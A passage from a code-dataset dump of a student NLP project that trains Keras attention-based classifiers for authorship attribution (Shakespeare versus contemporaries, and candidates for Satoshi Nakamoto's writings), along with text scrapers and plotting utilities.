lines_by_author_and_work[d[1]][d[2]].append(d[0])\n\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(texts)\n\n data_tuples = []\n for author, works in lines_by_author_and_work.items():\n print(author_id_map[author], \"has\", len(works.keys()), \"works...\")\n for work, lines in works.items():\n print(\" \", str(works_id_map[work][0]) + \":\", len(lines), \"examples\")\n for l in tokenizer.texts_to_sequences(lines):\n # 0 == shakespeare, plz don't be mad\n data_tuples.append((l, 0 if author == 0 else 1))\n print()\n\n with open(TOKENIZER_FILE, 'wb') as handle:\n pickle.dump((tokenizer, data_tuples, author_id_map, works_id_map, lines_by_author_and_work), handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n print(len(tokenizer.word_counts), \"words in vocab.\")\n print()\n\n print(len(data_tuples), \"data tuples.\")\n counts = [0] * len(author_id_map)\n for _, label in data_tuples:\n counts[label] += 1\n\n print(\"Shakespeare has\", counts[0], \"labelled examples.\")\n print(\"Other authors have\", counts[1], \"labelled examples.\")\n\n random.seed(259812)\n random.shuffle(data_tuples)\n\n vocab_size = len(tokenizer.word_docs) + 1\n\n X = sequence.pad_sequences([d[0] for d in data_tuples], maxlen=MAX_SEQUENCE_LEN)\n y = [d[1] for d in data_tuples]\n\n split = int(SPLIT_FRACTION * len(data_tuples))\n X_train, y_train = X[split*2:], y[split*2:]\n X_val, y_val = X[split:split*2], y[split:split*2]\n X_test, y_test = X[:split], y[:split]\n\n print(\"X_train shape:\", X_train.shape)\n print(\"X_val shape:\", X_val.shape)\n print(\"X_test shape:\", X_test.shape)\n\n print('Build model...')\n model = Sequential()\n model.add(Embedding(vocab_size, 128, mask_zero=False))\n model.add(Bidirectional(LSTM(128, dropout=0.5, recurrent_dropout=0.5, return_sequences=True)))\n model.add(Attention(direction=\"bidirectional\"))\n model.add(Dense(50, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(1, activation='sigmoid'))\n\n model.compile(\n loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n )\n\n plot_model(model, to_file=RESULT_DIR+'/shake-model.png')\n model.summary()\n\n if os.path.isfile(WEIGHTS_FILE):\n model.load_weights(WEIGHTS_FILE)\n\n if args.train:\n print(\"======= Training Network =======\")\n print()\n checkpointer = ModelCheckpoint(monitor='val_acc', filepath=WEIGHTS_FILE, verbose=1, save_best_only=True)\n earlystopping = EarlyStopping(monitor='val_acc', patience=10)\n model.fit(X_train, y_train,\n batch_size=BATCH_SIZE,\n epochs=TRAIN_EPOCHS,\n validation_data=(X_val, y_val),\n callbacks=[checkpointer, earlystopping])\n\n if args.evaluate_val:\n score, acc = model.evaluate(X_val, y_val, batch_size=BATCH_SIZE)\n print(\"Validation score:\", score)\n print(\"Validation accuracy:\", acc)\n\n with open(RESULT_DIR+\"/val-metrics.txt\", \"w\") as f:\n f.write(\"Val score: %s\\nVal accuracy: %s\" % (score, acc))\n\n pred = np.around(model.predict(X_val, batch_size=BATCH_SIZE))\n truth = np.around(y_val)\n cnf_matrix = sklearn.metrics.confusion_matrix(truth, pred)\n utils.plot_confusion_matrix(cnf_matrix, classes=[\"William Shakespeare\", \"Period playwrights\"], normalize=True, title=\"Val Split Confusion Matrix\")\n plt.savefig(RESULT_DIR+'/shake-val-confusion-matrix.png')\n plt.close()\n\n if args.evaluate_test:\n score, acc = model.evaluate(X_test, y_test, batch_size=BATCH_SIZE)\n print(\"Test score:\", score)\n print(\"Test accuracy:\", acc)\n\n pred = np.around(model.predict(X_test, batch_size=BATCH_SIZE))\n truth = np.around(y_test)\n cnf_matrix = sklearn.metrics.confusion_matrix(truth, pred)\n utils.plot_confusion_matrix(cnf_matrix, classes=[\"William Shakespeare\", \"Period playwrights\"], normalize=True, title=\"Shakespeare Confusion Matrix\")\n plt.savefig(RESULT_DIR+'/shake-test-confusion-matrix.png')\n plt.close()\n\n if args.evaluate_disputed:\n print()\n print(\"======= Evaluating Disputed Documents =======\")\n print()\n\n with open(DISPUTED_FILE, 'r') as disputed_data_handle:\n all_lines = [l.strip() for l in disputed_data_handle.readlines()]\n\n # strip \"// Metadata\", extract json metadata object, strip \"\\n // (<fields>)\"\n metadata = json.loads(all_lines[1])\n data = [ast.literal_eval(l) for l in all_lines[4:]]\n texts = [d[0] for d in data]\n\n works = metadata[\"works\"]\n works_id_map = {w[\"id\"]: w[\"title\"] for w in works}\n\n lines_by_work = defaultdict(list)\n for d in data:\n lines_by_work[d[2]].append(d[0])\n\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(texts)\n\n for work, lines in lines_by_work.items():\n print(str(works_id_map[work]) + \":\", len(lines), \"examples\")\n print()\n\n random.seed(259812)\n\n\n results = []\n for w in works_id_map.keys():\n\n data_tuples = []\n seqs = tokenizer.texts_to_sequences(lines_by_work[w])\n for j, seq in enumerate(seqs):\n for chunk in utils.chunks(seq, MAX_SEQUENCE_LEN):\n if len(chunk) >= MIN_SEQUENCE_LEN:\n # 0 is NOT a label here, just a placeholder\n data_tuples.append((chunk, 0))\n\n random.shuffle(data_tuples)\n\n # vocab_size = len(tokenizer.word_docs) + 1\n disputed_X = sequence.pad_sequences([d[0] for d in data_tuples], maxlen=MAX_SEQUENCE_LEN)\n\n pred = np.around(model.predict(disputed_X, batch_size=BATCH_SIZE))\n notws = np.sum(pred)\n ws = pred.shape[0] - notws\n\n print(\"Predicting authorship of\", works_id_map[w] + \"...\")\n print(\" total passages:\", pred.shape[0])\n print(\" \", ws, \"passages attributed to William Shakespeare\")\n print(\" \", notws, \"passages attributed to other authors\")\n print(\" classification consensus:\", \"William Shakespeare\" if ws > notws else \"Other contemporary authors\")\n print()\n\n results.append((w, ws, notws))\n\n # make the bar graph\n N = len(results)\n\n ws_counts = [r[1]/(r[1]+r[2]) for r in results]\n notws_counts = [r[2]/(r[1]+r[2]) for r in results]\n\n indexes = np.arange(N)\n width = 0.35\n\n p1 = plt.bar(indexes, ws_counts, width, color=(0.3, 0.45, 1.0))\n p2 = plt.bar(indexes, notws_counts, width, bottom=ws_counts, color=(0.3, 1.0, 0.45))\n plt.ylabel('% passages in work')\n plt.xlabel('Works')\n plt.title('Classification of passages with disputed attribution')\n plt.xticks(indexes + width/2.0, [works_id_map[r[0]] for r in results], rotation=70)\n plt.yticks(np.arange(0, 1.0, 0.05))\n\n plt.savefig(RESULT_DIR+'/shake-disputed-result-bar.png', bbox_inches='tight', pad_inches=2)\n plt.close()\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6396508812904358,
"alphanum_fraction": 0.6458852887153625,
"avg_line_length": 25.733333587646484,
"blob_id": "c1ce155fac2186139ac240fc87c159368fee6256",
"content_id": "badc25a7243081cec92ca73262e4c56d76118f97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 802,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 30,
"path": "/data/satoshi/mercury-reader.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "from mercury_parser.client import MercuryParser\nfrom slugify import slugify\n\nimport os\nimport argparse\nimport time\n\nimport html2text\n\nfrom dotenv import load_dotenv, find_dotenv\n\nif __name__ == \"__main__\":\n load_dotenv(find_dotenv())\n\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n parser = argparse.ArgumentParser()\n parser.add_argument('urls', help='The urls to parse.', metavar='N', nargs='+')\n args = parser.parse_args()\n\n mercury = MercuryParser(api_key=os.environ['MERCURY_PARSER_KEY'])\n\n for url in args.urls:\n print(\"Parsing\", url, \"...\")\n content = h.handle(mercury.parse_article(url).json()['content'])\n with open(slugify(url) + \".txt\", \"wb\") as f:\n f.write(content.encode('utf8'))\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.5186660289764404,
"alphanum_fraction": 0.5241413712501526,
"avg_line_length": 34.24561309814453,
"blob_id": "1f542dc870ffa876f2f113af7d576c3b699172e0",
"content_id": "58fec21d8d0871e069595dccd223a08e16e0478d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2009,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 57,
"path": "/data/satoshi/download-rss.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import html2text\nimport argparse\n\nfrom feedparser import parse\nfrom slugify import slugify\n\ndef download_author_comments(replies_url, author_names):\n url = replies_url\n while True:\n print (\"Parsing comments \", url, \"...\")\n feed = parse(url)\n for item in feed[\"items\"]:\n if item['author_detail']['name'] in author_names:\n with open(slugify(item[\"link\"]) + \".txt\", \"wb\") as f:\n f.write(h.handle(item[\"summary\"]).encode('utf8'))\n\n if 'feed' in feed and 'links' in feed['feed']:\n next_link = [link['href'] for link in feed['feed']['links'] if link['rel'] == 'next']\n if len(next_link) > 0:\n url = next_link[0]\n else:\n break\n else:\n break\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('url', help='The RSS url.')\n parser.add_argument('--authornames', nargs='+',\n help='Names that the author uses in the comments of their blog.')\n args = parser.parse_args()\n\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n url = args.url\n while True:\n print (\"Parsing\", url, \"...\")\n feed = parse(url)\n\n for item in feed[\"items\"]:\n # with open(slugify(item[\"link\"]) + \".txt\", \"wb\") as f:\n # f.write(h.handle(item[\"summary\"]).encode('utf8'))\n if args.authornames and 'links' in item:\n replies_link = [link['href'] for link in item['links'] if link['rel'] == 'replies']\n if len(replies_link) > 0:\n download_author_comments(replies_link[0], args.authornames)\n\n if 'feed' in feed and 'links' in feed['feed']:\n next_link = [link['href'] for link in feed['feed']['links'] if link['rel'] == 'next']\n if len(next_link) > 0:\n url = next_link[0]\n else:\n break\n else:\n break\n"
},
{
"alpha_fraction": 0.6169661283493042,
"alphanum_fraction": 0.6233561635017395,
"avg_line_length": 38.992591857910156,
"blob_id": "969bd7706956f394ae598b2292e6ed835913f465",
"content_id": "193a165651a0b2ba0be1a7764adcb7e7ed6adc1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10798,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 270,
"path": "/satoshi-classification.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "from keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, LSTM, Bidirectional, Dropout, GRU\nfrom keras.preprocessing.text import Tokenizer\nfrom keras import utils\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nfrom mkdir_p import mkdir_p\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\nimport glob\nimport random\nimport itertools\nimport argparse\n\nimport pickle\n\nfrom utils import plot_confusion_matrix, get_split, plot_length_vs_accuracy\nfrom sklearn.metrics import confusion_matrix\nfrom keras import backend as K\n\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nfrom attention_layer import Attention\n\nfrom keras.utils import plot_model\n\nBATCH_SIZE = 32\nTRAIN_EPOCHS = 15\n\nMIN_SEQUENCE_LEN = 10\nMAX_SEQUENCE_LEN = 200\n\nWEIGHTS_FILE = \"results/satoshi-weights.hdf5\"\nCANDIDATES = [\"gavin-andresen\", \"hal-finney\", \"jed-mccaleb\", \"nick-szabo\", \"roger-ver\", \"craig-steven-wright\", \"wei-dai\"]\n\nTOKENIZER_FILE = \"results/tokenizer.pickle\"\n\ndef is_valid_candidiate(c):\n if c not in CANDIDATES:\n raise argparse.ArgumentTypeError(\"%s is an invalid candidiate\" % c)\n return c\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', help='Run training.', action='store_true')\n parser.add_argument('--evaluate-test', help='Run evaluations on the test split.', action='store_true')\n parser.add_argument('--evaluate-val', help='Run evaluations on the val split.', action='store_true')\n parser.add_argument('--saliency-map', help='Generate a saliency map for this text.')\n parser.add_argument('--saliency-class', help='Generate a saliency map for this class.', type=is_valid_candidiate)\n parser.add_argument('--activation-map', help='Generate an activation map for this text.')\n args = parser.parse_args()\n\n mkdir_p(\"results\")\n\n if os.path.isfile(TOKENIZER_FILE):\n print(\"======= Loading Tokenizer =======\")\n with open(TOKENIZER_FILE, 'rb') as handle:\n texts, texts_by_candidate, tokenizer, reverse_word_map = pickle.load(handle)\n else:\n print(\"======= Loading in Texts =======\")\n texts = []\n texts_by_candidate = {}\n for c in CANDIDATES + ['satoshi-nakamoto']:\n texts_by_candidate[c] = []\n for path in glob.iglob(\"./data/satoshi/%s/*.txt\" % c, recursive=True):\n with open(path, \"r\", encoding=\"utf-8\") as f:\n text = f.read()\n texts.append(text)\n texts_by_candidate[c].append((text, path))\n\n print(\"======= Generating vocabulary =======\")\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(texts)\n reverse_word_map = dict(map(reversed, tokenizer.word_index.items()))\n\n with open(TOKENIZER_FILE, 'wb') as handle:\n pickle.dump((texts, texts_by_candidate, tokenizer, reverse_word_map), handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n for auth, txts in texts_by_candidate.items():\n print (auth, \"has\", len(txts), \"texts...\")\n\n print(len(tokenizer.word_counts), \"words in vocab.\")\n\n print(\"======= Generating Data Tuples =======\")\n def chunks(iterable,size):\n it = iter(iterable)\n chunk = list(itertools.islice(it,size))\n while chunk:\n yield chunk\n chunk = list(itertools.islice(it,size))\n\n data_tuples = []\n for i, c in enumerate(CANDIDATES):\n seqs = tokenizer.texts_to_sequences(t for t, p in texts_by_candidate[c])\n for j, seq in enumerate(seqs):\n split = get_split(texts_by_candidate[c][j][1])\n for chunk in chunks(seq, MAX_SEQUENCE_LEN):\n if len(chunk) >= MIN_SEQUENCE_LEN:\n data_tuples.append((chunk, i, split))\n\n print (len(data_tuples), 'data tuples.')\n\n counts = [0] * len(CANDIDATES)\n for _, label, _ in data_tuples:\n counts[label] += 1\n\n for candidate, count in zip(CANDIDATES, counts):\n print(candidate, \"has\", count, \"labelled examples.\")\n\n random.shuffle(data_tuples)\n\n def prepare_input_matrix(split):\n return sequence.pad_sequences([d[0] for d in data_tuples if d[2] == split], maxlen=MAX_SEQUENCE_LEN)\n def prepare_output_matrix(split):\n return utils.to_categorical([d[1] for d in data_tuples if d[2] == split], num_classes=len(CANDIDATES))\n\n vocab_size = len(tokenizer.word_docs)\n\n x_train, y_train = prepare_input_matrix('train'), prepare_output_matrix('train')\n x_test, y_test = prepare_input_matrix('test'), prepare_output_matrix('test')\n x_val, y_val = prepare_input_matrix('val'), prepare_output_matrix('val')\n\n print('x_train shape:', x_train.shape)\n print('x_test shape:', x_test.shape)\n print('x_val shape:', x_val.shape)\n\n print('Build model...')\n model = Sequential()\n model.add(Embedding(vocab_size, 128, mask_zero=False))\n model.add(Bidirectional(GRU(128, dropout=0.5, recurrent_dropout=0.5, return_sequences=True)))\n model.add(Attention(direction=\"bidirectional\"))\n model.add(Dense(50, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(len(CANDIDATES), activation='softmax'))\n\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n plot_model(model, to_file='results/satoshi-model.png')\n model.summary()\n\n if os.path.isfile(WEIGHTS_FILE):\n model.load_weights(WEIGHTS_FILE)\n\n if args.train:\n print('======= Training Network =======')\n checkpointer = ModelCheckpoint(monitor='val_acc', filepath=WEIGHTS_FILE, verbose=1, save_best_only=True)\n earlystopping = EarlyStopping(monitor='val_acc', patience=10)\n model.fit(x_train, y_train,\n batch_size=BATCH_SIZE,\n epochs=TRAIN_EPOCHS,\n validation_data=(x_val, y_val),\n callbacks=[checkpointer, earlystopping])\n\n if args.evaluate_val:\n score, acc = model.evaluate(x_val, y_val, batch_size=BATCH_SIZE)\n print('Val score:', score)\n print('Val accuracy:', acc)\n\n with open(\"results/satoshi-val-metrics.txt\", \"w\") as f:\n f.write(\"Val score: %s\\nVal accuracy: %s\" % (score, acc))\n\n pred = np.argmax(model.predict(x_val, batch_size=BATCH_SIZE), axis=1)\n truth = np.argmax(y_val, axis=1)\n cnf_matrix = confusion_matrix(truth, pred)\n plot_confusion_matrix(cnf_matrix, classes=CANDIDATES, normalize=True,\n title='Satoshi Val Split Confusion Matrix')\n plt.savefig('results/satoshi-val-confusion-matrix.png')\n plt.close()\n\n plot_length_vs_accuracy(10, data_tuples, pred, truth,\n MAX_SEQUENCE_LEN, \"Satoshi Accuracy vs. Sequence Length (Val)\")\n plt.close()\n\n if args.evaluate_test:\n score, acc = model.evaluate(x_test, y_test, batch_size=BATCH_SIZE)\n print('Test score:', score)\n print('Test accuracy:', acc)\n\n pred = np.argmax(model.predict(x_test, batch_size=BATCH_SIZE), axis=1)\n truth = np.argmax(y_test, axis=1)\n cnf_matrix = confusion_matrix(truth, pred)\n plot_confusion_matrix(cnf_matrix, classes=CANDIDATES, normalize=True,\n title=\"Satoshi Confusion Matrix\")\n plt.savefig('results/satoshi-test-confusion-matrix.png')\n plt.close()\n\n plot_length_vs_accuracy(10, data_tuples, pred, truth,\n MAX_SEQUENCE_LEN, \"Satoshi Accuracy vs. Sequence Length\")\n plt.close()\n\n print(\"======= Testing Satoshi Writings =======\")\n candidate_counts = [0] * len(CANDIDATES)\n satoshi_seqs = tokenizer.texts_to_sequences(t for t, p in texts_by_candidate['satoshi-nakamoto'])\n paths = [p for t, p in texts_by_candidate['satoshi-nakamoto']]\n padded = sequence.pad_sequences(satoshi_seqs)\n scores = model.predict(padded, batch_size=BATCH_SIZE)\n print(np.sum(scores, axis=0))\n\n pred = np.argmax(scores, axis=1)\n with open(\"results/satoshi-results.txt\", \"w\") as f:\n for i, c in enumerate(pred):\n candidate_counts[c] += 1\n f.write(os.path.basename(paths[i]) + \"\\t\" + CANDIDATES[c] + \"\\t\" + str(scores[i]))\n f.write('\\n')\n\n plt.bar(np.arange(len(CANDIDATES)), candidate_counts)\n plt.ylabel('Documents')\n plt.xlabel('Candidates')\n plt.title('Classification of Satoshi Writings')\n plt.xticks(np.arange(len(CANDIDATES)), CANDIDATES)\n plt.close()\n\n if args.saliency_map:\n print(\"======= Generating Saliency Map =======\")\n with open(args.saliency_map, \"r\", encoding=\"utf-8\") as f:\n text = f.read()\n\n input = model.layers[0].output\n output = model.layers[-1].output[:,CANDIDATES.index(args.saliency_class)]\n grad = K.gradients(output, input)[0]\n saliency = K.sum(K.pow(grad, 2), axis=2)\n compute_fn = K.function([model.layers[0].input, K.learning_phase()], [saliency])\n\n seq = tokenizer.texts_to_sequences([text])[0]\n data = sequence.pad_sequences([seq])\n saliency_mat = compute_fn([data, 0])[0][0]\n saliency_mat = saliency_mat / np.max(saliency_mat)\n\n scores = model.predict(data)[0]\n pred = np.argmax(scores)\n\n env = Environment(\n loader=FileSystemLoader('.'),\n autoescape=select_autoescape(['html', 'xml'])\n )\n template = env.get_template('saliency-vis-template.html')\n\n tokens = list(reverse_word_map[id] for id in seq)\n\n with open(\"results/saliency-map.html\", \"wb\") as f:\n f.write(template.render(words=zip(tokens, saliency_mat)).encode('utf-8'))\n\n print(\"Scores:\", scores)\n print(\"Predicted Class:\", CANDIDATES[pred])\n\n if args.activation_map:\n print(\"======= Generating Activation Map =======\")\n with open(args.activation_map, \"r\", encoding=\"utf-8\") as f:\n text = f.read()\n\n activations = model.layers[1].output\n compute_fn = K.function([model.layers[0].input, K.learning_phase()], [activations])\n\n seq = tokenizer.texts_to_sequences([text])[0]\n data = sequence.pad_sequences([seq])\n activation_mat = compute_fn([data, 0])[0][0]\n\n env = Environment(loader=FileSystemLoader('.'),\n autoescape=select_autoescape(['html', 'xml']))\n env.globals.update(zip=zip, npmax=np.max, npabs=np.abs)\n template = env.get_template('activation-vis-template.html')\n tokens = list(reverse_word_map[id] for id in seq)\n\n with open(\"results/activation-map.html\", \"wb\") as f:\n f.write(template.render(tokens=tokens, activation_mat=activation_mat.T).encode('utf-8'))\n"
},
{
"alpha_fraction": 0.5868410468101501,
"alphanum_fraction": 0.5974662899971008,
"avg_line_length": 32.98611068725586,
"blob_id": "fe33b75ec60dbd926a2b44b2103390982fab685e",
"content_id": "55b52473484918b110fea62bc3f2d76809333f6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2447,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 72,
"path": "/utils.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport itertools\nimport hashlib\n\nimport matplotlib.pyplot as plt\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\ndef chunks(iterable, size):\n it = iter(iterable)\n chunk = list(itertools.islice(it, size))\n while chunk:\n yield chunk\n chunk = list(itertools.islice(it, size))\n\ndef plot_length_vs_accuracy(bins, data_tuples, pred, truth, max_seq_len, title):\n correct_bins = [0] * bins\n total_bins = [0] * bins\n bin_size = (max_seq_len // bins)\n\n for seq, pred, truth in zip([d[0] for d in data_tuples if d[2] == 'val'], pred, truth):\n bin = int(((len(seq) - 1) / max_seq_len) * bins)\n total_bins[bin] += 1\n if pred == truth:\n correct_bins[bin] += 1\n accuracy = [correct / total for correct, total in zip(correct_bins, total_bins)]\n plt.bar(np.arange(bins), accuracy)\n plt.ylabel('Accuracy')\n plt.xlabel('Sequence Size')\n\n plt.title(title)\n plt.xticks(np.arange(bins), [\"%d-%d\" % (bin_size * i, bin_size * (i + 1)) for i in range(bins)])\n\ndef get_split(string, test_split = 0.1, validation_split = 0.1):\n string_hash = hashlib.md5(string.encode('utf-8')).digest()\n prob = int.from_bytes(string_hash[:2], byteorder='big') / 2**16\n if prob < test_split:\n return 'test'\n elif prob > 1 - validation_split:\n return 'val'\n else:\n return 'train'\n"
},
{
"alpha_fraction": 0.5682539939880371,
"alphanum_fraction": 0.5795918107032776,
"avg_line_length": 37.68421173095703,
"blob_id": "d5714ea26b34e909afa77821531d34e57c38bdb5",
"content_id": "87112b9b48f23e0a212f55a8132ff91b9d5c07fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2205,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 57,
"path": "/attention_layer.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom keras import backend as K\nfrom keras.engine.topology import Layer\nfrom keras.layers import Wrapper, Recurrent\n\nclass Attention(Layer):\n def __init__(self, direction = \"forward\", variant=\"dot-product\", **kwargs):\n self.direction = direction\n self.variant = variant\n super(Attention, self).__init__(**kwargs)\n\n def build(self, input_shape):\n assert len(input_shape) == 3\n samples, time_steps, hidden_dim = input_shape[0], input_shape[1], input_shape[2]\n\n if self.variant == \"multiplicative\":\n self.w = self.add_weight(shape=(hidden_dim, hidden_dim),\n initializer='uniform', name='kernel')\n\n super(Attention, self).build(input_shape)\n\n def call(self, x):\n shape = K.shape(x)\n samples, time_steps, embedding_dim = shape[0], shape[1], shape[2]\n\n if self.direction == \"forward\":\n prev_hidden_states = x[:, :time_steps-1, :]\n final_hidden_state = x[:, time_steps-1, :]\n elif self.direction == \"backward\":\n prev_hidden_states = x[:, 1:, :]\n final_hidden_state = x[:, 0, :]\n elif self.direction == \"bidirectional\":\n forward_states = x[:, :, :(embedding_dim // 2)]\n backward_states = x[:, :, (embedding_dim // 2):]\n\n prev_hidden_states = K.concatenate([\n forward_states[:, :time_steps-1, :],\n backward_states[:, 1:, :]])\n\n final_hidden_state = K.concatenate([\n forward_states[:, time_steps-1, :],\n backward_states[:, 0, :]])\n else:\n raise ArgumentTypeError(\"Invalid direction %s\" % self.direction)\n\n if self.variant == \"multiplicative\":\n prev_hidden_states = K.dot(prev_hidden_states, self.w)\n\n scores = K.sum(prev_hidden_states * K.expand_dims(final_hidden_state, axis=1), axis=2)\n weights = K.softmax(scores)\n attention = K.sum(K.expand_dims(weights, axis=2) * prev_hidden_states, axis=1)\n\n return K.concatenate([final_hidden_state, attention], axis=-1)\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0], input_shape[2] * 2)\n"
},
{
"alpha_fraction": 0.48842474818229675,
"alphanum_fraction": 0.48867639899253845,
"avg_line_length": 23.677019119262695,
"blob_id": "e77f6e0f588c96b0dcb6b49811f2d39089a4244e",
"content_id": "9c78d7178a805158a7443d5594c87050de0e82d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3974,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 161,
"path": "/data/shakespeare/process.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import os\nfrom subprocess import call\n\ndef strip_substring(s, subs, suffix=False):\n if not suffix:\n idx = s.find(subs)\n else:\n idx = s.find(subs, len(s) - len(subs))\n return s[:idx] + s[idx + len(subs):]\n\nclass FileProcessing:\n\n DEFAULT_TEMP_FILENAME = 'temp.txt'\n\n def __init__(self, raw_filename):\n with open(raw_filename, 'r') as f:\n self.lines = [l.strip() for l in f.readlines()]\n\n self.temp_filename = self.DEFAULT_TEMP_FILENAME\n self.temp_file = open(self.temp_filename, 'w')\n self.flush()\n\n if os.path.isfile('/usr/local/bin/sublime'):\n call(['sublime', self.temp_file.name])\n\n self.prev = None\n\n def flush(self):\n self.temp_file.seek(0)\n self.temp_file.truncate()\n self.temp_file.writelines(\n [l + '\\n' for l in self.lines]\n )\n self.temp_file.flush()\n os.fsync(self.temp_file.fileno())\n\n if os.path.isfile('/usr/local/bin/sublime'):\n call(['sublime'])\n\n return self\n\n def output(self, final_filename):\n with open(final_filename, 'w+') as final:\n final.writelines(\n [l + '\\n' for l in self.lines]\n )\n return self\n\n def close(self):\n self.temp_file.close()\n os.remove(self.temp_filename)\n return self\n\n def _save(self):\n self.prev = {\n 'lines': self.lines,\n 'prev': self.prev,\n }\n return self\n\n def undo(self):\n if self.prev is not None:\n self.lines = self.prev['lines']\n self.prev = self.prev['prev']\n self.flush()\n else:\n print(\"Nothing to undo.\")\n return self\n\n def operation(self, op):\n self._save()\n self.lines = op(self.lines)\n self.flush()\n\n def remove_empty(self):\n self.operation(\n lambda lines: [l for l in lines if l != \"\"]\n )\n return self\n\n def remove_contains(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [l for l in lines if c not in l]\n )\n return self\n\n def remove_exact(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [l for l in lines if c != l]\n )\n return self\n\n def remove_prefix(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [l for l in lines if not l.startswith(c)]\n )\n return self\n\n def remove_suffix(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [l for l in lines if not l.endswith(c)]\n )\n return self\n\n def remove_range(self, start, end):\n self.operation(\n lambda lines: lines[:start] + lines[end:]\n )\n return self\n\n def strip_contains(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [strip_substring(l, c) if c in l else l for l in lines]\n )\n return self\n\n def strip_prefix(self, a):\n if type(a) != list:\n a = [a]\n\n for p in a:\n self.operation(\n lambda lines: [strip_substring(l, p) if l.startswith(p) else l for l in lines]\n )\n return self\n\n def strip_suffix(self, a):\n if type(a) != list:\n a = [a]\n\n for s in a:\n self.operation(\n lambda lines: [strip_substring(l, s, True) if l.endswith(s) else l for l in lines]\n )\n return self\n\n def remove_predicate(self, pred):\n self.operation(\n lambda lines: [l for l in lines if pred(l)]\n )\n return self\n\n"
},
{
"alpha_fraction": 0.5994831919670105,
"alphanum_fraction": 0.6098191142082214,
"avg_line_length": 31.25,
"blob_id": "bcd94f014e0e391847f6fcf029157926bb71665c",
"content_id": "f04d4df3e2f0dc6fe778d679fed2f6c5c45721c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 774,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 24,
"path": "/data/satoshi/download-hn-user.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport requests\nimport time\n\nimport html2text\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('user', help='The Hackernews username')\n args = parser.parse_args()\n\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n user = requests.get('https://hacker-news.firebaseio.com/v0/user/%s.json' % args.user).json()\n for item in user['submitted']:\n print(\"Requesting HN item\", item, \"...\")\n data = requests.get('https://hacker-news.firebaseio.com/v0/item/%s.json' % item).json()\n if data['type'] == 'comment':\n with open(\"hn-comment-%d.txt\" % item, \"wb\") as f:\n f.write(h.handle(data['text']).encode('utf8'))\n\n time.sleep(0.5)\n"
},
{
"alpha_fraction": 0.524402916431427,
